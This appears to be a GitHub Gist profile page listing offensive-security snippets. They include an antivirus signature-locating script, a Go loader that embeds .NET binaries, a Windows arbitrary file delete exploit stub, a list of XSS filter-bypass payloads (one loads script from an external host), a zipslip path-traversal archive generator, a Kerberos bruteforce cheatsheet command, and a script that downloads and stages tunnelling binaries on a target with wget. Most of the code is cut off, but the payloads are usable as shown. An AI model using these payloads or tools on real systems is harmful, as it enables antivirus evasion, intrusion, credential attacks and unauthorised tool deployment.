Skip to content

Instantly share code, notes, and snippets.

Avatar
🏴‍☠️

xct xct

🏴‍☠️
View GitHub Profile
View Find-AVSignature.ps1
function Find-AVSignature {
<#
.SYNOPSIS
Find-AVSignature
Locates single Byte AV signatures utilizing the same method as DSplit from "class101" on heapoverflow.com
Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation)
License: BSD 3-Clause
@xct
xct / go-sharp-loader.go
Created Aug 6, 2020 — forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
View go-sharp-loader.go
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs are in a "binaries" folder
View WerArbitraryFileDelete.cs
using NtApiDotNet;
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading;
using System.Threading.Tasks;
View impersonate.go
// A demonstration example for http://stackoverflow.com/a/26124494
// It runs a goroutine locked to an OS thread on Windows
// then impersonates that thread as another user using its name
// and plaintext password, then reverts to the default security
// context before detaching from its OS thread.
package main
import (
"log"
"runtime"
@xct
xct / xxsfilterbypass.lst
Created Aug 20, 2019 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
View xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@xct
xct / zipslip.py
Last active Aug 5, 2021
Creates zips with relative paths ("zipslip")
View zipslip.py
#!/usr/bin/env python
import zipfile
import sys
import os
'''
Usage:
python zipslip.py xct.zip root.txt ../../../../..
Added ../../../../../root.txt to xct.zip
'''
@xct
xct / kerberos_attacks_cheatsheet.md
Created Jun 23, 2019 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
View kerberos_attacks_cheatsheet.md

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@xct
xct / ssf.md
Last active Jun 19, 2019
Deploy ssf to a windows or linux target & run
View ssf.md

Windows

param([string]$addr, [string]$port)
wget "http://${addr}:${port}/ssf.exe" -o "ssf.exe"
wget "http://${addr}:${port}/ssfd.exe" -o "ssfd.exe"
mkdir certs
cd certs
wget "http://${addr}:${port}/certs/certificate.crt" -o "certificate.crt"
wget "http://${addr}:${port}/certs/dh4096.pem" -o "dh4096.pem"